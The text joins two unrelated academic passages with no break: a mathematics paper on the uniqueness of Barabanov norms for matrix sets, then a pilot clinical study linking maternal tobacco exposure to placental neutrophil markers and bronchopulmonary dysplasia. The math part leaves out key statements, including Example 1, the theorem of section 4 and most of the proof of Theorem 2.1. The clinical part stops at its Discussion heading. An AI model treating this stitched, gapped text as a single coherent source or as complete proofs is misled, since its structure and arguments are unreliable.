and since A is assumed to be compact, it follows that we may extract a sequence (A_{i_j})_{j=1}^∞ of elements of A such that |||A_{i_n} · · · A_{i_1} v||| = ϱ(A)^n |||v||| for every n ≥ 1. As various researchers have noted (see e.g. [11,12,19]), Barabanov norms thus implicitly encode a description of certain sequences of matrices drawn from A whose partial products grow at the maximum possible exponential rate. The problem of constructing or approximating a Barabanov norm for a given set of matrices has consequently attracted some recent research interest [13,14,16,19]. In this note we continue an investigation initiated in [16] into the closely related question of determining when Barabanov norms are unique. Clearly if a given norm satisfies (1.1), then any positive scalar multiple of that norm will also satisfy (1.1), so when saying that a set of matrices has a "unique" Barabanov norm, we shall always mean only that any two Barabanov norms for that set must be proportional to one another by a scalar constant.
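Equation (1.1) can also be checked numerically for a candidate norm. The sketch below (our addition) samples random unit vectors and reports the worst violation, here for a rotation together with a rank one orthogonal projection, a pair for which the Euclidean norm satisfies the relation with ϱ = 1.

```python
import numpy as np

def barabanov_defect(mats, jsr, norm=np.linalg.norm, trials=1000, seed=0):
    """Largest violation of max_A norm(A v) = jsr * norm(v) over random
    unit vectors; a value near 0 is consistent with `norm` being a
    Barabanov norm for the set."""
    rng = np.random.default_rng(seed)
    worst = 0.0
    for _ in range(trials):
        v = rng.standard_normal(mats[0].shape[0])
        v /= norm(v)
        best = max(norm(A @ v) for A in mats)
        worst = max(worst, abs(best - jsr))
    return worst

theta = np.pi / 4
R = np.array([[np.cos(theta), -np.sin(theta)],
              [np.sin(theta),  np.cos(theta)]])   # rotation, norm-preserving
P = np.array([[1.0, 0.0], [0.0, 0.0]])            # orthogonal projection
print(barabanov_defect([R, P], jsr=1.0))          # ~0 up to float precision
```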
In the earlier article [16] we established a sufficient condition for a finite irreducible set A = {A_1, . . . , A_m} of d × d matrices over R or C to have a unique Barabanov norm in the sense defined above. We showed that if A has both the rank one property and the unbounded agreements property, defined formally in the next section, then a unique Barabanov norm for A exists. Roughly speaking, the unbounded agreements property states that there are not "too many" sequences (A_{i_j})_{j=1}^∞ ∈ A^N such that the sequence of products ϱ(A)^{-n} A_{i_n} · · · A_{i_1} does not converge to zero in the limit as n → ∞, while the rank one property states that for any fixed sequence of matrices, the vector space of all vectors v such that ϱ(A)^{-n} A_{i_n} · · · A_{i_1} v converges to zero has the largest possible dimension. In this note we establish a new sufficient condition for the uniqueness of Barabanov norms which is complementary to the sufficient condition given in [16], and which applies in certain situations where there is instead a large supply of sequences (A_{i_j}) and vectors v such that ϱ(A)^{-n} A_{i_n} · · · A_{i_1} v does not converge to zero. The new condition may also be applied to compact infinite sets of matrices. As direct examples of the application of the theorem, we exhibit firstly a pair of matrices which has a unique Barabanov norm but satisfies neither the rank one property nor the unbounded agreements property (hence not falling within the scope of [16]), and secondly a countably infinite compact set of matrices which has a unique Barabanov norm, but such that every finite subset thereof has an uncountable family of Barabanov norms which are not proportional to one another.
We also use the main theorem in this note to investigate the robustness with respect to perturbation of the property of having a unique Barabanov norm. It was shown in [16] that for every pair of integers r, d ≥ 2, and for K equal to either R or C, there exists an r-tuple of d × d matrices over K such that every sufficiently small perturbation of that r-tuple also has a unique Barabanov norm. As an application of our main theorem, we show that there exists a pair of real 2 × 2 matrices A with the following contrasting property: pairs of matrices having a unique Barabanov norm, and pairs of matrices not having a unique Barabanov norm, both form dense sets in a small open neighbourhood of A. The property of having a unique Barabanov norm is thus shown to be highly sensitive to small perturbations of the set of matrices in certain cases.
Statement and proof of main theorem
Throughout the rest of this note we use the symbol K as a shorthand to denote either R or C. Statements which are given in terms of K are thus valid if either of these two fields is consistently chosen. We use the symbol M_d(K) to denote the set of all d × d matrices over K, which we equip with its usual topology as a normed vector space. The symbol ‖ · ‖ will be used to denote the Euclidean norm on K^d, and also the corresponding induced matrix norm on M_d(K). The symbol ρ(B) will be used to denote the ordinary spectral radius of the matrix B.
If A is a compact subset of M_d(K) and n ≥ 1 is an integer, we define

A^n := { A_n · · · A_1 : A_1, . . . , A_n ∈ A }.

We say that A is relatively product bounded if sup_{n≥1} sup{ ϱ(A)^{-n} ‖B‖ : B ∈ A^n } < ∞; every compact irreducible set is relatively product bounded, see for example [11]. If A ⊂ M_d(K) is relatively product bounded, then following F. Wirth in [20] we define the limit semigroup of A to be the set

S(A) := { B ∈ M_d(K) : B = lim_{j→∞} ϱ(A)^{-n_j} B_j for some B_j ∈ A^{n_j} with n_j → ∞ }.

We may now give the formal definition of the rank one property and the unbounded agreements property mentioned in the introduction. We say that A has the rank one property if it is relatively product bounded and every nonzero element of S(A) is of rank one. The finite set of matrices A = {A_1, . . . , A_m} has the unbounded agreements property if for every pair of sequences j_1, j_2 : N → {1, . . . , m} such that lim sup_{n→∞} ϱ(A)^{-n} ‖A_{j_i(n)} · · · A_{j_i(1)}‖ > 0 for i = 1, 2, and every integer ℓ ≥ 1, there exist k_1, k_2 ≥ 0 such that j_1(k_1 + t) = j_2(k_2 + t) for all t in the range 1 ≤ t ≤ ℓ. (We do not define the unbounded agreements property for infinite sets of matrices.) The central result of this note is the following sufficient condition for the uniqueness of the Barabanov norm:

Theorem 2.1. Let A be a bounded, irreducible nonempty subset of M_d(K) such that the limit semigroup S(A) has the following transitivity property: for every pair of nonzero vectors v_1, v_2 ∈ K^d, there exist B_1, B_2 ∈ S(A) and λ ∈ K such that B_1 v_1 = λ v_2 and λ B_2 v_2 = v_1. Then A admits a unique Barabanov norm.

Proof. Since A is irreducible, it admits at least one Barabanov norm. Fix a nonzero vector v_0 ∈ K^d for the remainder of the proof, and suppose that ||| · |||_1 and ||| · |||_2 are both Barabanov norms for A which give norm 1 to the vector v_0. To prove the theorem it is necessary and sufficient to show that ||| · |||_1 must be equal to ||| · |||_2.
Remark. When K = R, the most straightforward case in which Theorem 2.1 may be applied is that in which S(A) contains the special orthogonal group SO(d), or more generally, when S(A) is simultaneously similar to a semigroup which contains SO(d). In particular, if ϱ(A)^{-1} A contains a collection of matrices which generate a dense subsemigroup of SO(d) (or which are simultaneously similar to such a collection) then Theorem 2.1 may be applied and A has a unique Barabanov norm. Similar remarks apply to the case K = C and the group SU(d). However, these cases certainly do not exhaust the possibilities of the theorem: for example, if A consists precisely of the set of rank one orthogonal projections on R², then S(A) contains every real matrix which is equal to the composition of a rotation and an orthogonal projection, and Theorem 2.1 also applies. Higher-dimensional examples of this type may of course also be constructed. In any case, Theorem 2.1 is powerful enough to produce some interesting applications, which we describe in the following two sections.
Examples
Proof. Let us first establish the properties of A for general θ ∈ R \ Z. Since θ ∉ Z, the matrix A_2 does not preserve any one-dimensional subspace of R², and therefore A is irreducible. It is straightforward to see that max{ ‖A‖ : A ∈ A^n } = 1 for every n ≥ 1 and consequently ϱ(A) = 1. In particular A is product bounded. Every accumulation point at infinity of the sequence (A_2^n)_{n=1}^∞ has rank two, and so A does not have the rank one property. Since lim_{n→∞} ‖A_i^n‖ = 1 for both i = 1 and i = 2, the unbounded agreements property is also not satisfied.

Let us now consider those properties which depend on whether or not θ ∈ Q. If θ ∉ Q then every rotation matrix in M_2(R) is an accumulation point of (A_2^n)_{n=1}^∞, and so S(A) contains the group of rotation matrices. It follows easily that A meets the hypotheses of Theorem 2.1 and has a unique Barabanov norm. Conversely, let us suppose that θ ∈ Q. Let ||| · ||| be any norm whose unit ball is invariant under rotation through angle θπ and such that |||(x, 0)^T||| ≤ |||(x, y)^T||| for all x, y ∈ R. The former property ensures that |||A_2 v||| = |||v||| = ϱ(A)|||v||| for every v ∈ R², and the latter property ensures that |||A_1 v||| ≤ |||v||| = ϱ(A)|||v||| for every v, so in particular any such norm is Barabanov. If K ⊂ R² is a compact convex set with nonempty interior which is symmetric with respect to rotation about the origin through angles θπ and π, and such that there exists a vertical tangent to K at each of its boundary points lying on the horizontal axis, then K is the unit ball of a norm which has the required properties. It is clear that uncountably many such sets exist which are not related to one another by scalar multiplication, and we conclude that A has uncountably many Barabanov norms.
The following example shows that the uniqueness of Barabanov norms can be a quite delicate phenomenon:

Example 2. Let us define a compact subset of M_2(R) by

A := { R_{π/2^n} : n ≥ 1 } ∪ { I },

where R_φ denotes the matrix of rotation through angle φ and I denotes the identity matrix. Then every nonempty subset of A has joint spectral radius equal to one, is product bounded, and does not have the rank one property. Every subset of A with at least two elements is irreducible, and finite subsets of A which have at least two elements do not satisfy the unbounded agreements property. Every infinite subset of A has a unique Barabanov norm, but every finite nonempty subset of A has uncountably many Barabanov norms.
Proof. Let B ⊆ A be a nonempty subset. It is clear that sup{ ‖B‖ : B ∈ B^n } = 1 for all n ≥ 1, so that ϱ(B) = 1 and B is product bounded, and it is also clear that S(B) contains the identity matrix, so that the rank one property is not satisfied. If B has at least two elements then it includes a rotation matrix with no real eigenvalues, and hence B is irreducible. Since lim_{n→∞} ‖B^n‖ = 1 for every B ∈ B, the unbounded agreements property is not satisfied when B is finite and contains at least two elements. Since every element of B preserves the Euclidean norm, that norm is a Barabanov norm for B.
Let us now consider the uniqueness or otherwise of Barabanov norms for B. Suppose first that B is infinite. In this case there exist infinitely many positive integers q such that B includes the matrix of rotation through angle π/2^q. If q is such an integer, then in particular it follows that S(B) contains the group of all rotations through angles of the form kπ/2^q. Since q may be taken arbitrarily large, it follows that S(B) contains every rotation by a dyadic rational multiple of π, and since S(B) is closed we conclude that SO(2) ⊆ S(B). Theorem 2.1 therefore applies and the Euclidean norm is the unique Barabanov norm of B. Now let us suppose that B ⊂ A is finite and nonempty. If B consists only of the identity matrix then every norm on R² is preserved by B and hence is Barabanov. Otherwise, let n be the largest integer such that B contains the matrix corresponding to rotation through angle π/2^n. If K ⊂ R² is a compact convex set with nonempty interior which is invariant under rotation through angle π/2^n, then it is invariant under the action of every element of B. To each such K there corresponds a norm on R² which has K as its unit ball, hence is invariant under every element of B and therefore is Barabanov. Since there exist uncountably many compact convex sets K which are invariant under rotation through angle π/2^n and are not pairwise similar, we conclude that B has uncountably many Barabanov norms.
A theoretical application
Following the notation of [16], let us use the symbol O_2(R²) to denote the set of all ordered pairs of 2 × 2 real matrices, which we equip with the topology arising from the natural identification of this space with M_2(R) ⊕ M_2(R). In [16] we showed that O_2(R²) contains a nonempty open set U with the property that for every (A_1, A_2) ∈ U, the set A = {A_1, A_2} has a unique Barabanov norm. For matrix pairs belonging to U, therefore, the property of having a unique Barabanov norm is robust with respect to sufficiently small perturbations of either or both of the matrices comprising the pair. This result naturally leads one to ask whether this phenomenon is typical: is the set of all (A_1, A_2) ∈ O_2(R²) such that {A_1, A_2} has a unique Barabanov norm necessarily open? The following result shows that this is not the case: there is a nonempty open subset of O_2(R²) in which pairs having a unique Barabanov norm and pairs having uncountably many Barabanov norms are both dense.

Proof. Let A_2 be a rotation matrix which does not have real eigenvalues, and let A_1 be any matrix such that ‖A_1‖ < ‖A_2‖ = 1. We will take V to be a suitably small neighbourhood of (A_1, A_2).
For each δ > 0 let B_δ denote the open ball about the origin in M_2(R) which has radius δ with respect to the spectral norm. Since the eigenvalues of A_2 are simple, we may choose ε > 0 small enough that there exist continuous functions E : B_ε → C, V : B_ε → C² such that for all C ∈ B_ε, E(C) is a strictly complex eigenvalue of the real matrix A_2 + C with corresponding complex eigenvector V(C). Since A_2 + C is real, the complex conjugates of E(C) and V(C) are also an eigenvalue and an eigenvector respectively. Since E(C) is strictly complex it is not equal to its complex conjugate, and consequently the associated eigenvectors V(C) and its conjugate are linearly independent over C. It follows from this that the real and imaginary parts of V(C) are a linearly independent pair of vectors with respect to R. For each C ∈ B_ε let us now define S(C) to be the invertible real matrix with first column given by ℑ(V(C)) and second column given by ℜ(V(C)). An elementary calculation shows that S(C)^{-1}(A_2 + C)S(C) is precisely the real matrix of rotation through angle arg E(C) multiplied by the positive scalar factor |E(C)| = ρ(A_2 + C). For each C ∈ B_ε define a norm ‖ · ‖_C on R² by ‖v‖_C := ‖S(C)^{-1}v‖ for every v ∈ R². It is easily seen that ρ(A_2 + C)^{-1}(A_2 + C) is an isometry of R² with respect to this norm, and in particular ‖A_2 + C‖_C = ρ(A_2 + C). Since A_2 is a rotation matrix, a direct calculation shows that S(0) is proportional to the identity and therefore ‖ · ‖_0 is a scalar multiple of the Euclidean norm on R². Let us now define

V := { (B_1, B_2) ∈ O_2(R²) : B_2 − A_2 ∈ B_ε and ‖B_1‖_{B_2 − A_2} < ρ(B_2) }.

Clearly V contains (A_1, A_2), and since S : B_ε → M_2(R) is continuous, V is open. We claim that (B_1, B_2) ∈ V has a unique Barabanov norm if and only if the eigenvalues of ρ(B_2)^{-1}B_2 are not roots of unity. An easy perturbation argument shows that pairs (B_1, B_2) ∈ V such that the eigenvalues of B_2 have irrational arguments, and pairs such that the eigenvalues of B_2 have rational arguments, are both dense in V. It follows that establishing this claim is sufficient to complete the proof of the theorem.
For the rest of the proof let us fix an arbitrary pair of matrices (B_1, B_2) ∈ V. Define C := B_2 − A_2 ∈ B_ε. It is straightforward to see that sup{ ‖B‖_C : B ∈ B^n } = ρ(B_2)^n for every n ≥ 1 and therefore ϱ(B) = ρ(B_2). Since ρ(B_2)^{-1}B_2 is an isometry of R² with respect to the norm ‖ · ‖_C, and ‖B_1‖_C < ρ(B_2) = ϱ(B), it follows directly that ‖ · ‖_C is a Barabanov norm for B.
Let us suppose first that the eigenvalues of ρ(B_2)^{-1}B_2 are not roots of unity. In this case ρ(B_2)^{-1}S(C)^{-1}B_2 S(C) is a matrix corresponding to rotation through an irrational angle. It follows that every rotation matrix is a limit point at infinity of the sequence (ϱ(B)^{-n} S(C)^{-1} B_2^n S(C))_{n=1}^∞, and so S(C)^{-1} S(B) S(C) contains the group of rotation matrices. We deduce that B satisfies the hypotheses of Theorem 2.1 and conclude that ‖ · ‖_C is the unique Barabanov norm of B. Now let us suppose instead that the eigenvalues of ρ(B_2)^{-1}B_2 are roots of unity. Similarly to Examples 1 and 2 in the previous section, there exist uncountably many norms on R² which are preserved by the rational-angle rotation matrix ρ(B_2)^{-1}S(C)^{-1}B_2 S(C) and are not proportional to one another or to the Euclidean norm. Modifying these norms by composition with S(C)^{-1}, as in the definition of the norm ‖ · ‖_C, we obtain an uncountable family of norms on R² which are preserved by ρ(B_2)^{-1}B_2 and are not proportional to one another or to ‖ · ‖_C. Let ||| · ||| be any such norm. We will show that for every sufficiently small real number κ > 0, the norm on R² given by |||v|||_* := ‖v‖_C + κ|||v||| is a Barabanov norm for B. By repeating this procedure using a different norm ||| · ||| which is also preserved by ρ(B_2)^{-1}B_2, or indeed by simply varying the constant κ within its permitted range, it is clear that we may obtain an uncountable family of Barabanov norms for B which are not pairwise proportional to one another.
Acknowledgment
This research was conducted as part of the ERC grant MALADY (246953).
Placental Neutrophil Infiltration Associated with Tobacco Exposure but Not Development of Bronchopulmonary Dysplasia
Objective: In utero inflammation is associated with bronchopulmonary dysplasia (BPD) in preterm infants. We hypothesized that maternal tobacco exposure (TE) might induce placental neutrophil infiltration, increasing the risk for BPD. Study design: We compared the composite outcome of BPD and death in a prospective pilot study of TE and no-TE mothers and their infants born <32 weeks. Placental neutrophil infiltration was approximated by neutrophil gelatinase-associated lipocalin (NGAL) ELISA, and total RNA expression was analyzed via NanoString© (Seattle, WA, USA). Result: Of 39 enrolled patients, 44% were classified as tobacco exposure. No significant difference was noted in the infant’s composite outcome of BPD or death based on maternal tobacco exposure. NGAL was higher in placentas of TE vs. non-TE mothers (p < 0.05). Placental RNA analysis identified the upregulation of key inflammatory genes associated with maternal tobacco exposure. Conclusion: Tobacco exposure during pregnancy was associated with increased placental neutrophil markers and upregulated inflammatory gene expression. These findings were not associated with BPD.
Introduction
Tobacco exposure (TE) during pregnancy is highly prevalent in the United States. As reported by the Centers for Disease Control and Prevention (CDC) in 2016, 7.2% of mothers smoked cigarettes during pregnancy [1]. It is well recognized that maternal tobacco use during pregnancy is linked to many negative outcomes for infants, including low birth weight, preterm birth, preterm prolonged rupture of membranes (PPROM), and birth defects [2-5].
Recently, Antonucci et al. indicated that in utero exposure to smoking is an independent risk factor for the development of bronchopulmonary dysplasia (BPD) in premature infants born weighing less than 1500 g [6]. BPD is the most prevalent sequela of preterm birth, affecting 10,000-15,000 infants annually in the United States [7]. Known postnatal risk factors for the disease include hyperoxia, mechanical ventilation, patent ductus arteriosus (PDA), and sepsis; antenatal risk factors include chorioamnionitis, preeclampsia, and hypertension [8-12].
Neutrophil gelatinase-associated lipocalin (NGAL) is a glycoprotein found predominantly in neutrophil granules. NGAL is normally expressed at low levels but is often elevated in the blood, bronchoalveolar lavage (BAL) fluid, and sputum of adults with lung diseases such as asthma and chronic obstructive pulmonary disease (COPD) [13]. Notably, serum levels of NGAL at birth are significantly higher in preterm infants who develop BPD.
Materials and Methods
Study design: This pilot prospective, observational study was conducted between October 2018 and December 2019 and was approved by the Institutional Review Board at the University of Oklahoma Health Sciences Center (OUHSC). Written informed consent was obtained for the mother and newborn either prior to delivery or within 24 h post-delivery. Following consent, a 9-item maternal questionnaire for self-identification of tobacco exposure during pregnancy was completed (Figure A1). Our maternal questionnaire on tobacco use was internally validated in a previous study, in which cotinine (a nicotine metabolite) was detectable only in mothers who reported tobacco exposure [21]. Patients were stratified into two groups: TE mothers and non-TE mothers.
Study population: Participants included mothers and their preterm infants born at a gestational age of <32 weeks. Infants were excluded based on known major congenital anomalies, maternal concern for infection (e.g., clinical chorioamnionitis), maternal fever >38°C within 24 h before delivery, presence of meconium-stained fluid, maternal history of impaired immunity, or a concomitant medical condition impacting the inflammatory response.
Data collection: Data were de-identified and prospectively collected and managed using a data collection sheet at OUHSC. Maternal and neonatal demographic characteristics were collected via chart review. The secondary outcome was the composite of BPD or death. BPD status was assessed at 36 weeks postmenstrual age (PMA) using the National Institutes of Health (NIH) workshop definition [22]. Mild BPD is defined as breathing room air at 36 weeks corrected age or time of discharge, moderate BPD as needing <30% oxygen at 36 weeks corrected age/discharge, and severe BPD as needing >30% oxygen at 36 weeks corrected age/discharge. For the purpose of this study, infants were classified by the presence or absence of BPD; absence of BPD was defined as no or mild BPD, and presence of BPD as moderate to severe BPD [22]. Additional outcomes included necrotizing enterocolitis (NEC), intraventricular hemorrhage (IVH), retinopathy of prematurity (ROP), PDA, and sepsis. A mother was considered to have received antenatal corticosteroids if she received a full or partial betamethasone or dexamethasone course. Intrauterine growth restriction (IUGR) was defined as intrauterine estimated fetal weight less than the 10th percentile. PPROM was defined as having membranes ruptured for more than 18 h. Placental samples from both groups were evaluated for histological chorioamnionitis by one of two pathologists blinded to maternal tobacco exposure status. Positive tobacco exposure was defined as maternal 'daily' to 'almost daily' active smoking or 'daily' to 'almost daily' secondhand smoke exposure, as reported on the maternal tobacco exposure questionnaire (Figure A1).
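To make the dichotomization concrete, the following is a minimal sketch of the BPD classification logic described above, assuming the oxygen requirement at 36 weeks PMA (or discharge) is already known for each infant; the function and argument names are hypothetical and not part of the study's code.

```python
def classify_bpd(on_room_air: bool, fio2: float) -> str:
    """Assign BPD severity per the NIH workshop definition as used here.

    on_room_air: breathing room air at 36 weeks PMA or discharge.
    fio2: fraction of inspired oxygen at assessment (0.30 = 30% oxygen).
    """
    if on_room_air:
        return "none/mild"
    return "moderate" if fio2 < 0.30 else "severe"

def has_bpd(severity: str) -> bool:
    # Study definition: presence of BPD = moderate-to-severe disease.
    return severity in ("moderate", "severe")
```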
To determine the contribution of tobacco exposure to the development of BPD, the groups were further subdivided into (1) TE mothers with infants developing BPD (BPD TE group); (2) non-TE mothers with infants developing BPD (BPD No TE group); (3) TE mothers with infants not developing BPD (No BPD TE group); and (4) non-TE mothers with infants not developing BPD (No BPD No TE group).
Sample collection: Fresh placental tissue samples were collected within 24 h of delivery. Three full-thickness sections of placental parenchyma (including fetal and maternal surfaces), one section of extraplacental membrane roll, and two sections of the umbilical cord (proximal and distal) were collected and fixed in 10% formalin for routine histopathological examination and diagnosis. One full-thickness section was split and preserved for both RNA analysis (RNAlater™, Invitrogen, Carlsbad, CA, USA) and protein analysis (snap-frozen in liquid nitrogen). All samples were stored at −80 °C until further analysis.
Immunohistochemistry (IHC): IHC was performed according to the manufacturer's protocols using a Leica Bond-III™ Polymer Refine Detection System (DS 9800). Formalin-fixed paraffin-embedded (FFPE) tissues were sectioned at the desired thickness (4 µm) and mounted on positively charged slides. The slides were dried overnight at room temperature and incubated at 60 °C for 45 min, followed by deparaffinization and rehydration in an automated multi-stainer (Leica ST5020). Subsequently, slides were transferred to the Leica Bond-III™ and treated for antigen retrieval at 100 °C for 20 min in a retrieval solution at either pH 6.0 or 9.0. Endogenous peroxidase was blocked using a peroxidase-blocking reagent, followed by 60 min of incubation with NGAL antibody (Catalog #711280, ThermoFisher Scientific, Waltham, MA, USA) diluted 1:100. Post-primary IgG-linker and/or poly-HRP IgG reagents were used as the secondary antibody. Detection was accomplished via the chromogen 3,3′-diaminobenzidine tetrahydrochloride (DAB), with hematoxylin counterstaining. Completed slides were dehydrated (Leica ST5020) and mounted (Leica MM24). An antibody-specific positive control and a negative control (omission of primary antibody) were stained in parallel. Additionally, two pathologists blinded to smoking and BPD status scored staining semi-quantitatively by anatomical location, with scores from zero to four: score 0, no staining; score 1, 1-10 positive cells per high-power field (HPF); score 2, 11-50 positive cells/HPF; score 3, 51-75 positive cells/HPF; and score 4, >75 positive cells/HPF.

Protein analysis and enzyme-linked immunosorbent assay (ELISA): ELISA was used to quantify NGAL (Catalog #036RUO, BioPorto Diagnostics A/S, Hellerup, Denmark) following the manufacturer's instructions. Briefly, frozen placental tissue was mechanically homogenized using a BeadBeater (Next Advance Inc., Troy, NY, USA) in a buffer containing phosphatase and protease inhibitors (Catalog #524625 and #535140, Millipore, Burlington, MA, USA) and PMSF (Sigma-Aldrich, St. Louis, MO, USA). Results were normalized to total protein concentration determined by bicinchoninic acid (BCA) assay (Catalog #23227, Pierce Biotechnology, Rockford, IL, USA).
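The semi-quantitative IHC scale maps directly onto count bins, so it can be expressed as a small lookup; this is an illustrative re-implementation of the scoring rule above, not the pathologists' actual workflow.

```python
def ngal_ihc_score(positive_cells_per_hpf: int) -> int:
    """Map NGAL-positive cells per high-power field (HPF) to the
    0-4 semi-quantitative scale used by the blinded pathologists."""
    if positive_cells_per_hpf <= 0:
        return 0              # no staining
    if positive_cells_per_hpf <= 10:
        return 1              # 1-10 positive cells/HPF
    if positive_cells_per_hpf <= 50:
        return 2              # 11-50 positive cells/HPF
    if positive_cells_per_hpf <= 75:
        return 3              # 51-75 positive cells/HPF
    return 4                  # >75 positive cells/HPF
```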
Total RNA analysis/NanoString: A random subset of 12 patients was selected from the four subgroups (n = 3/group): BPD TE; BPD No TE; No BPD TE; and No BPD No TE. A BeadBeater was used to mechanically homogenize placental tissue. Total RNA was extracted per the manufacturer's protocols using a Zymo Quick-RNA MidiPrep kit (Catalog #R1056, Zymo Research, Irvine, CA, USA). Total RNA, between 25 ng and 300 ng, was loaded onto an nCounter® Human Immunology v2 Panel (Catalog #XT-CSO-HIM2-12, NanoString, Seattle, WA, USA). This panel consists of 594 genes of interest and 15 internal reference genes. Data were analyzed using nCounter Analysis and nCounter Advanced Analysis software. RCC output files were imported into NanoString nSolver 4.0. Default quality control (QC) settings were used to verify the quality of all data (>95% of fields of view [FOV] and binding densities between 0.2 and 0.5). The background was corrected by subtracting the mean value of 8 engineered RNA negative control sequences from the raw counts of all genes. The geometric mean was calculated for the 15 housekeeping genes, and the nine genes with the lowest coefficient of variation were used to normalize the data. Genes with mean normalized counts of less than 50 were excluded from the analysis. The control group was defined as No TE (or No BPD No TE for subgroup analysis). Gene expression differences are reported as log2-fold changes, holding all other variables constant; the 95% confidence intervals (CI) for the log2-fold change and the p values are reported. A 1.2-fold change was selected as the differential threshold.
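The normalization pipeline (background subtraction, housekeeping-gene scaling, and low-count filtering) can be sketched as follows. This is a pandas approximation of the steps described above; nSolver's exact defaults may differ, and the gene lists are assumed inputs.

```python
import numpy as np
import pandas as pd

def normalize_ncounter(raw: pd.DataFrame, neg_ctrl: list, housekeeping: list) -> pd.DataFrame:
    """Approximate nCounter normalization; `raw` is genes x samples of raw counts."""
    # 1. Background correction: subtract each sample's mean negative-control
    #    count from every gene, clipping negatives at zero.
    background = raw.loc[neg_ctrl].mean(axis=0)
    corrected = raw.drop(index=neg_ctrl).sub(background, axis=1).clip(lower=0)

    # 2. Of the 15 housekeeping genes, keep the 9 with the lowest
    #    coefficient of variation across samples.
    hk = corrected.loc[housekeeping]
    cv = hk.std(axis=1) / hk.mean(axis=1)
    reference = cv.nsmallest(9).index

    # 3. Scale each sample by the geometric mean of the reference genes.
    log_ref = np.log(corrected.loc[reference].replace(0, np.nan))
    geo_mean = np.exp(log_ref.mean(axis=0))
    normalized = corrected.mul(geo_mean.mean() / geo_mean, axis=1)

    # 4. Exclude genes whose mean normalized count is below 50.
    return normalized[normalized.mean(axis=1) >= 50]
```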
Given the unpredictable nature of preterm deliveries, our protocol allowed up to 24 h for placenta collection, although the majority of samples were collected within 2-12 h. Once collected, the placenta was immediately placed at 4 °C. The pathologist then collected full-thickness sections, which were stored at −80 °C or preserved in RNAlater™. This methodology allows collection of high-quality RNA from placentas stored at 4 °C, or even at room temperature, for up to 48 h prior to transfer into a stabilizing solution such as RNAlater™ [23].
Statistical methods: This is a pilot/preliminary study on a topic where little is known about the association between inflammation within the placenta and the development of BPD in preterm neonates. While we have directional hypotheses, we felt it would be inappropriate to quantify an effect size given the paucity of research on the topic. Descriptive statistics were computed for demographic and clinical variables. Comparisons of categorical variables between patients developing BPD or death and those who did not were evaluated with Fisher's exact test. Continuous variables were assessed for normality and then compared between groups using a Kruskal-Wallis test or Student's t-test, as appropriate. Frequencies and percentages were reported for categorical variables across BPD status. Means and standard deviations are reported for continuous variables. Statistical significance is defined, in all experiments, as p < 0.05.
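As a sketch, this comparison logic maps directly onto scipy.stats; the table counts below are illustrative only, not the study's data.

```python
from scipy import stats

def compare_continuous(group_a, group_b, alpha=0.05):
    """Normality-gated comparison: Student's t-test when both groups
    pass a Shapiro-Wilk check, Kruskal-Wallis otherwise."""
    normal = (stats.shapiro(group_a).pvalue > alpha and
              stats.shapiro(group_b).pvalue > alpha)
    test = stats.ttest_ind if normal else stats.kruskal
    return test(group_a, group_b)

# Categorical outcome vs. exposure as a 2x2 table (illustrative counts):
# rows = BPD-or-death yes/no, columns = tobacco-exposed yes/no
table = [[9, 8], [8, 14]]
odds_ratio, p_value = stats.fisher_exact(table)
```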
Results
In total, 95 mothers were screened, and 49 mothers were approached for study enrollment based on the inclusion and exclusion criteria. Eight mothers declined, and two became ineligible after being approached (they delivered at >32 weeks' gestation). Demographic characteristics for the remaining 39 patients were stratified by the presence and absence of tobacco exposure (Table 1), as well as by the presence or absence of the composite outcome of BPD or death (Table A1). Of enrolled mothers, 43.6% reported tobacco exposure during pregnancy (Tables 1 and A2). Of these tobacco-exposed mothers, two reported that the exposure was via secondhand smoke.
No differences in birth weight, birth length, head circumference, gestational age, gender, maternal ethnicity, antenatal steroids, mode of delivery, intubation in the delivery room, intubation in the NICU, PDA medical or surgical treatment, IVH grade 3 or 4, ROP, IUGR <10th percentile, or death or BPD were noted with maternal tobacco exposure. There was an association with maternal age (p = 0.048), with tobacco-exposed mothers being slightly older (Table 1). When comparing tobacco-exposed and non-exposed mothers, no differences in diabetes status, maternal hypertension, prolonged rupture of membranes, chorioamnionitis, antepartum hemorrhage, marijuana use, or other illicit drug use were present (Table 2). No differences in the incidence of NEC or sepsis based on maternal tobacco exposure were noted.
As expected, infants with the composite outcome of BPD or death had significantly lower (p < 0.001) birth weight, length, head circumference, and gestational age compared with the No BPD group. Additionally, more infants in the composite outcome group required intubation in the delivery room (p = 0.001) or the NICU (p < 0.001), required medical management of PDA (p = 0.01), and developed threshold ROP (p = 0.017) compared to the No BPD group (Table A1). The remainder of the maternal and neonatal demographic characteristics did not differ between groups. From the maternal perspective, we found no significant association between tobacco exposure status and maternal complications, with the exception of an increased incidence of antepartum hemorrhage in the composite outcome group (p = 0.003) (Table A2). While there was no association between maternal tobacco exposure and an infant's risk of developing BPD, IHC of placental tissues showed higher expression of NGAL in the fetal surfaces and upper portion of the placental parenchyma of tobacco-exposed mothers (Figure 1A,C) compared to those of No TE mothers (Figure 1B,D). The IHC for the BPD TE group (Figure 1A) showed higher expression of NGAL compared to the BPD No TE group (Figure 1B). Regardless of BPD status, NGAL was highly expressed in the TE groups (BPD TE and No BPD TE) compared to the No TE groups (BPD No TE and No BPD No TE). Additionally, NGAL staining intensity scores were higher in the chorionic plate and subchorionic space of placentas from tobacco-exposed mothers, regardless of BPD status, though these differences did not reach statistical significance (Figure 1E,G; p = 0.065 and p = 0.091, respectively).
To confirm these histological findings, NGAL ELISA was performed in each of the four subgroups. As shown in Figure 2A, NGAL levels were significantly higher in the placentas of tobacco-exposed compared to No TE mothers (p < 0.0001). Further subgroup analysis based on BPD outcomes showed that NGAL levels were significantly higher in the BPD TE group compared to the No BPD No TE group (Figure 2B, p < 0.01). Notably, the BPD No TE group also had significantly higher levels of NGAL compared to the No BPD No TE group (Figure 2B, p < 0.001). Altogether, these data suggest that tobacco exposure during pregnancy is associated with increased neutrophil activation/infiltration in the placenta, and that this activation/infiltration is increased further still in the placentas of tobacco-exposed infants who develop BPD.
Next, the immune placental transcriptome from a subset of infants from all four subgroups was profiled using the NanoString nCounter™ Immunology Panel. Comparing BPD TE to No BPD No TE, 22 genes were significantly differentially expressed (Table 3) out of a total of 594 genes of potential interest (Table A3). Notably, transcript levels for the chemokines IL8 (CXCL8) and CXCL10, the inflammatory molecules S100A8/A9, and the receptor CD44 were significantly upregulated in BPD TE compared to No BPD No TE infants (Table 3; p < 0.05), influencing cell signaling and inflammatory cytokine pathways (e.g., Figure A2). No other significant differences were found between the groups. When the subgroups were further compared based on the neonatal outcome of BPD, expression of CXCL8 and CXCL10 was similarly upregulated in the BPD TE group compared to the No BPD No TE group.
Discussion
